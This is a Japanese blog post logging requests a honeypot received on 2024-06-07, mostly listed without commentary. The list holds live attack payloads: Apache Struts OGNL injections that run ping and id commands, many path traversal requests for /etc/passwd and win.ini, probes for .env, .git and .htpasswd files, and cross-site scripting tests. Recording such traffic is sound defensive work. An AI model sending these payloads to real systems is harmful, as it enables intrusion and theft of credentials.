コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/06/07 ハニーポット(仮) 観測記録 その2

ハニーポット(仮) 観測記録 2024/06/07分 その2です。

Location:US

リクエスト内容一覧

件数 Method Request Protocol
1 GNUTELLA CONNECT/0.6
1 GNUTELLA CONNECT/0.4
1 MGLNDD_34.68.118.83_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
12 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\xfb\x01
1 \x16\x03\x01\x02\xb7\x01
20 \x16\x03\x01\x02
24 \x16\x03\x01
2 \x16\x03
2 ``
1 ACL /admin/4ghjig3F.htm HTTP/1.1
1 ACL /administrator/PE5p3rXa.htm HTTP/1.1
1 ACL /bYvTnJuH.htm HTTP/1.1
1 ACL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 ACL /db/o7LCQt3q.htm HTTP/1.1
1 ACL /file/SSiqsE8j.htm HTTP/1.1
1 ACL /icons/u1quIJcl.htm HTTP/1.1
1 ACL /images/pTcJweRJ.htm HTTP/1.1
1 ACL /manager/jmrwHjG5.htm HTTP/1.1
1 ACL /mysql/k37dAoEg.htm HTTP/1.1
1 ACL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 ACL /pma/gSyfwTnT.htm HTTP/1.1
1 BASELINE-CONTROL /admin/4ghjig3F.htm HTTP/1.1
1 BASELINE-CONTROL /administrator/PE5p3rXa.htm HTTP/1.1
1 BASELINE-CONTROL /bYvTnJuH.htm HTTP/1.1
1 BASELINE-CONTROL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BASELINE-CONTROL /db/o7LCQt3q.htm HTTP/1.1
1 BASELINE-CONTROL /file/SSiqsE8j.htm HTTP/1.1
1 BASELINE-CONTROL /icons/u1quIJcl.htm HTTP/1.1
1 BASELINE-CONTROL /images/pTcJweRJ.htm HTTP/1.1
1 BASELINE-CONTROL /manager/jmrwHjG5.htm HTTP/1.1
1 BASELINE-CONTROL /mysql/k37dAoEg.htm HTTP/1.1
1 BASELINE-CONTROL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BASELINE-CONTROL /pma/gSyfwTnT.htm HTTP/1.1
1 BCOPY /admin/4ghjig3F.htm HTTP/1.1
1 BCOPY /administrator/PE5p3rXa.htm HTTP/1.1
1 BCOPY /bYvTnJuH.htm HTTP/1.1
1 BCOPY /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BCOPY /db/o7LCQt3q.htm HTTP/1.1
1 BCOPY /file/SSiqsE8j.htm HTTP/1.1
1 BCOPY /icons/u1quIJcl.htm HTTP/1.1
1 BCOPY /images/pTcJweRJ.htm HTTP/1.1
1 BCOPY /manager/jmrwHjG5.htm HTTP/1.1
1 BCOPY /mysql/k37dAoEg.htm HTTP/1.1
1 BCOPY /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BCOPY /pma/gSyfwTnT.htm HTTP/1.1
1 BDELETE /admin/4ghjig3F.htm HTTP/1.1
1 BDELETE /administrator/PE5p3rXa.htm HTTP/1.1
1 BDELETE /bYvTnJuH.htm HTTP/1.1
1 BDELETE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BDELETE /db/o7LCQt3q.htm HTTP/1.1
1 BDELETE /file/SSiqsE8j.htm HTTP/1.1
1 BDELETE /icons/u1quIJcl.htm HTTP/1.1
1 BDELETE /images/pTcJweRJ.htm HTTP/1.1
1 BDELETE /manager/jmrwHjG5.htm HTTP/1.1
1 BDELETE /mysql/k37dAoEg.htm HTTP/1.1
1 BDELETE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BDELETE /pma/gSyfwTnT.htm HTTP/1.1
1 BMOVE /admin/4ghjig3F.htm HTTP/1.1
1 BMOVE /administrator/PE5p3rXa.htm HTTP/1.1
1 BMOVE /bYvTnJuH.htm HTTP/1.1
1 BMOVE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BMOVE /db/o7LCQt3q.htm HTTP/1.1
1 BMOVE /file/SSiqsE8j.htm HTTP/1.1
1 BMOVE /icons/u1quIJcl.htm HTTP/1.1
1 BMOVE /images/pTcJweRJ.htm HTTP/1.1
1 BMOVE /manager/jmrwHjG5.htm HTTP/1.1
1 BMOVE /mysql/k37dAoEg.htm HTTP/1.1
1 BMOVE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BMOVE /pma/gSyfwTnT.htm HTTP/1.1
1 BPROPFIND /admin/4ghjig3F.htm HTTP/1.1
1 BPROPFIND /administrator/PE5p3rXa.htm HTTP/1.1
1 BPROPFIND /bYvTnJuH.htm HTTP/1.1
1 BPROPFIND /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BPROPFIND /db/o7LCQt3q.htm HTTP/1.1
1 BPROPFIND /file/SSiqsE8j.htm HTTP/1.1
1 BPROPFIND /icons/u1quIJcl.htm HTTP/1.1
1 BPROPFIND /images/pTcJweRJ.htm HTTP/1.1
1 BPROPFIND /manager/jmrwHjG5.htm HTTP/1.1
1 BPROPFIND /mysql/k37dAoEg.htm HTTP/1.1
1 BPROPFIND /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BPROPFIND /pma/gSyfwTnT.htm HTTP/1.1
1 BPROPPATCH /admin/4ghjig3F.htm HTTP/1.1
1 BPROPPATCH /administrator/PE5p3rXa.htm HTTP/1.1
1 BPROPPATCH /bYvTnJuH.htm HTTP/1.1
1 BPROPPATCH /cgi-bin/8nWK_13r.htm HTTP/1.1
1 BPROPPATCH /db/o7LCQt3q.htm HTTP/1.1
1 BPROPPATCH /file/SSiqsE8j.htm HTTP/1.1
1 BPROPPATCH /icons/u1quIJcl.htm HTTP/1.1
1 BPROPPATCH /images/pTcJweRJ.htm HTTP/1.1
1 BPROPPATCH /manager/jmrwHjG5.htm HTTP/1.1
1 BPROPPATCH /mysql/k37dAoEg.htm HTTP/1.1
1 BPROPPATCH /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 BPROPPATCH /pma/gSyfwTnT.htm HTTP/1.1
1 CHECKIN /admin/4ghjig3F.htm HTTP/1.1
1 CHECKIN /administrator/PE5p3rXa.htm HTTP/1.1
1 CHECKIN /bYvTnJuH.htm HTTP/1.1
1 CHECKIN /cgi-bin/8nWK_13r.htm HTTP/1.1
1 CHECKIN /db/o7LCQt3q.htm HTTP/1.1
1 CHECKIN /file/SSiqsE8j.htm HTTP/1.1
1 CHECKIN /icons/u1quIJcl.htm HTTP/1.1
1 CHECKIN /images/pTcJweRJ.htm HTTP/1.1
1 CHECKIN /manager/jmrwHjG5.htm HTTP/1.1
1 CHECKIN /mysql/k37dAoEg.htm HTTP/1.1
1 CHECKIN /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 CHECKIN /pma/gSyfwTnT.htm HTTP/1.1
1 CHECKOUT /admin/4ghjig3F.htm HTTP/1.1
1 CHECKOUT /administrator/PE5p3rXa.htm HTTP/1.1
1 CHECKOUT /bYvTnJuH.htm HTTP/1.1
1 CHECKOUT /cgi-bin/8nWK_13r.htm HTTP/1.1
1 CHECKOUT /db/o7LCQt3q.htm HTTP/1.1
1 CHECKOUT /file/SSiqsE8j.htm HTTP/1.1
1 CHECKOUT /icons/u1quIJcl.htm HTTP/1.1
1 CHECKOUT /images/pTcJweRJ.htm HTTP/1.1
1 CHECKOUT /manager/jmrwHjG5.htm HTTP/1.1
1 CHECKOUT /mysql/k37dAoEg.htm HTTP/1.1
1 CHECKOUT /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 CHECKOUT /pma/gSyfwTnT.htm HTTP/1.1
1 CONNECT /admin/4ghjig3F.htm HTTP/1.1
1 CONNECT /administrator/PE5p3rXa.htm HTTP/1.1
1 CONNECT /bYvTnJuH.htm HTTP/1.1
1 CONNECT /cgi-bin/8nWK_13r.htm HTTP/1.1
1 CONNECT /db/o7LCQt3q.htm HTTP/1.1
1 CONNECT /file/SSiqsE8j.htm HTTP/1.1
1 CONNECT /icons/u1quIJcl.htm HTTP/1.1
1 CONNECT /images/pTcJweRJ.htm HTTP/1.1
1 CONNECT /manager/jmrwHjG5.htm HTTP/1.1
1 CONNECT /mysql/k37dAoEg.htm HTTP/1.1
1 CONNECT /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 CONNECT /pma/gSyfwTnT.htm HTTP/1.1
5 CONNECT google[.]com:443 HTTP/1.1
1 COPY /admin/4ghjig3F.htm HTTP/1.1
1 COPY /administrator/PE5p3rXa.htm HTTP/1.1
1 COPY /bYvTnJuH.htm HTTP/1.1
1 COPY /cgi-bin/8nWK_13r.htm HTTP/1.1
1 COPY /db/o7LCQt3q.htm HTTP/1.1
1 COPY /file/SSiqsE8j.htm HTTP/1.1
1 COPY /icons/u1quIJcl.htm HTTP/1.1
1 COPY /images/pTcJweRJ.htm HTTP/1.1
1 COPY /manager/jmrwHjG5.htm HTTP/1.1
1 COPY /mysql/k37dAoEg.htm HTTP/1.1
1 COPY /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 COPY /pma/gSyfwTnT.htm HTTP/1.1
1 DEBUG /admin/4ghjig3F.htm HTTP/1.1
1 DEBUG /administrator/PE5p3rXa.htm HTTP/1.1
1 DEBUG /bYvTnJuH.htm HTTP/1.1
1 DEBUG /cgi-bin/8nWK_13r.htm HTTP/1.1
1 DEBUG /db/o7LCQt3q.htm HTTP/1.1
1 DEBUG /file/SSiqsE8j.htm HTTP/1.1
1 DEBUG /icons/u1quIJcl.htm HTTP/1.1
1 DEBUG /images/pTcJweRJ.htm HTTP/1.1
1 DEBUG /manager/jmrwHjG5.htm HTTP/1.1
1 DEBUG /mysql/k37dAoEg.htm HTTP/1.1
1 DEBUG /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 DEBUG /pma/gSyfwTnT.htm HTTP/1.1
1 DELETE /admin/4ghjig3F.htm HTTP/1.1
1 DELETE /administrator/PE5p3rXa.htm HTTP/1.1
1 DELETE /bYvTnJuH.htm HTTP/1.1
1 DELETE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 DELETE /db/o7LCQt3q.htm HTTP/1.1
1 DELETE /file/SSiqsE8j.htm HTTP/1.1
1 DELETE /icons/u1quIJcl.htm HTTP/1.1
1 DELETE /images/pTcJweRJ.htm HTTP/1.1
1 DELETE /manager/jmrwHjG5.htm HTTP/1.1
1 DELETE /mysql/k37dAoEg.htm HTTP/1.1
1 DELETE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 DELETE /pma/gSyfwTnT.htm HTTP/1.1
1 GET %. HTTP/1.1
1 GET %24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27ping%20-c%203%20-p%20344a33387a7359483576%20172.16.4.12%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D// HTTP/1.1\n
1 GET %24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ping%20-c%203%20-p%20344a33387a7359483576%20172.16.4.12%27%29%29%7D// HTTP/1.1\n
1 GET %24%7B%7B57550614+16044095%7D%7D// HTTP/1.1
1 GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
1 GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1
1 GET /!pwds.txt HTTP/1.1
1 GET /# HTTP/1.1
1 GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1
1 GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini HTTP/1.1
1 GET /%2f/admin.html HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../windows/win.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../winnt/win.ini HTTP/1.1
1 GET /%NETHOOD%/ HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini HTTP/1.1
1 GET /*.shtml//index[.]jsp HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/winnt/win.ini HTTP/1.1
1 GET /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../winnt/win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../winnt/win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
1 GET /..htaccess.swp HTTP/1.1
1 GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /././.. HTTP/1.1
1 GET /././././././../../../../../etc/passwd HTTP/1.1
1 GET /././././././../../../../../windows/win.ini HTTP/1.1
1 GET /././././././../../../../../winnt/win.ini HTTP/1.1
1 GET /./WEB-INF/ HTTP/1.1
1 GET /.DS_Store HTTP/1.1
1 GET /.FBCIndex HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /.anydomain.test HTTP/1.0
1 GET /.bak/ HTTP/1.1
1 GET /.bash_history HTTP/1.1
1 GET /.cobalt/ HTTP/1.1
2 GET /.cobalt HTTP/1.1
16 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/info/refs?service=git-upload-pack HTTP/1.1
1 GET /.htaccess.1 HTTP/1.1
1 GET /.htaccess.bak HTTP/1.1
1 GET /.htaccess.copy HTTP/1.1
1 GET /.htaccess.old HTTP/1.1
1 GET /.htaccess.tmp HTTP/1.1
1 GET /.htaccess.~1~ HTTP/1.1
1 GET /.htaccess HTTP/1.1
1 GET /.htaccess~ HTTP/1.1
1 GET /.htpasswd HTTP/1.1
1 GET /.svn/entries HTTP/1.1
1 GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
1 GET //${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.print('Nessus%20Response:%20'),%23w.println('struts_2_3_14_3_command_execution-976434573'),%23w.flush(),%23w.close()}.action HTTP/1.1
1 GET //${976434573+5}.action HTTP/1.1
1 GET //(%23mem=%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%3f@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]):index.xhtml?cmd=ping%20%2dc%203%20%2dp%2056694164356f47376261%20172.16.4.12 HTTP/1.1\n
1 GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET //////////////// HTTP/1.1
1 GET /////////////// HTTP/1.1
1 GET ////////////// HTTP/1.1
1 GET ///////////// HTTP/1.1
1 GET //////////// HTTP/1.1
1 GET /////////// HTTP/1.1
1 GET ////////// HTTP/1.1
1 GET ///////// HTTP/1.1
1 GET //////// HTTP/1.1
1 GET /////// HTTP/1.1
1 GET ////// HTTP/1.1
1 GET ///// HTTP/1.1
1 GET //// HTTP/1.1
1 GET /// HTTP/1.1
1 GET //Help[.]action HTTP/1.1
1 GET //MhgpRabH[.]asp HTTP/1.0
11 GET // HTTP/1.1
1 GET //about/default_content.asp HTTP/1.1
1 GET //admincp/login.php HTTP/1.1
1 GET //etc/passwd HTTP/1.1
1 GET //home[.]html?0 HTTP/1.1
1 GET //idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET //index[.]php?/auth/login/ HTTP/1.1
1 GET //index[.]php?kietu[url_hit]=http[:]//example[.]com/ HTTP/1.1
1 GET //index[.]php HTTP/1.1
1 GET //login/login HTTP/1.1
1 GET //login[.]jsp HTTP/1.1
1 GET //main[.]php HTTP/1.1
1 GET //perl?-v HTTP/1.1
1 GET //perl[.]exe?-v HTTP/1.1
1 GET //plugins/db/mysql/mysql.inc.php HTTP/1.1
1 GET //plugins/payment/authorize_aim/authorize_aim.inc.php HTTP/1.1
1 GET //plugins/payment/beanstream/beanstream.inc.php HTTP/1.1
1 GET //plugins/payment/cdg/cdg.inc.php HTTP/1.1
1 GET //plugins/payment/compuworld/compuworld.inc.php HTTP/1.1
1 GET //plugins/payment/directone/directone.inc.php HTTP/1.1
1 GET //plugins/payment/echo/config.inc.php HTTP/1.1
1 GET //plugins/payment/efsnet/efsnet.inc.php HTTP/1.1
1 GET //plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php HTTP/1.1
1 GET //plugins/payment/eway/eway.inc.php HTTP/1.1
1 GET //plugins/payment/linkpoint/linkpoint.inc.php HTTP/1.1
1 GET //plugins/payment/logiccommerce/logiccommerce.inc.php HTTP/1.1
1 GET //plugins/payment/netbilling/netbilling.inc.php HTTP/1.1
1 GET //plugins/payment/payflow_pro/payflow_pro.inc.php HTTP/1.1
1 GET //plugins/payment/paymentsgateway/paymentsgateway.inc.php HTTP/1.1
1 GET //plugins/payment/payos/payos.inc.php HTTP/1.1
1 GET //plugins/payment/payready/payready.inc.php HTTP/1.1
1 GET //plugins/payment/plugnplay/plugnplay.inc.php HTTP/1.1
1 GET //plugins/payment/theinternetcommerce/theinternetcommerce.inc.php HTTP/1.1
1 GET //struts/webconsole.html HTTP/1.1
1 GET //surgeweb?username_ex=\"><scri<script>alert(42);</script><input type=\"hidden
1 GET //user/index.php HTTP/1.1
1 GET //wbm/login/ HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /1/ HTTP/1.1
1 GET /10/ HTTP/1.1
1 GET /1717627705-ror_session_fixation.nasl HTTP/1.1
1 GET /1717627706/certificate/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /1717627706/facts/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /18uToLHS.ashx HTTP/1.1
1 GET /2/ HTTP/1.1
1 GET /3/ HTTP/1.1
1 GET /4/ HTTP/1.1
1 GET /431cb5237001e73e794398e4fa3cf660/css/main-green.css HTTP/1.1
1 GET /4_Mi3ZoG.aspx HTTP/1.1
1 GET /4images/ HTTP/1.1
1 GET /4images/index.php HTTP/1.1
1 GET /5/ HTTP/1.1
2 GET /500page.jsp HTTP/1.1
1 GET /5n3yrimx.asp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.asp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.aspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.cfc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.cfm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.cgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.dll?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.dll?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.do?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.do?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.exe?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.exe?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.fts?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.fts?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.htm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.htm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.html?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.html?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.idc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.idc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.jsp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.jspa?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.kspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.mscgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.nsf?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.php3?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.php3?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.php?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.php?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /5n3yrimx.pl?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.pl?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
